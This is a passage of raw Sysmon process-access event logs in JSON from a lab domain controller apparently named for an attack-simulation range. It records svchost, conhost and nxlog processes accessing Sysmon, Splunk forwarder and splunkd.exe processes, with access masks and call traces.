06:56:01.940","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6278,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:01.940\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:01.940","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6279,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:01.940\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:01.940","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6280,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:01.940\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:01.940","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6281,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:01.940\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-00109AD20800}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:01.940","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-00109AD20800}","TargetProcessId":"4812","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6282,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:02.534\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:02.534","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6283,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:03.534\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:03.534","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6284,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:04.534\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:04.534","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6285,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:05.534\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 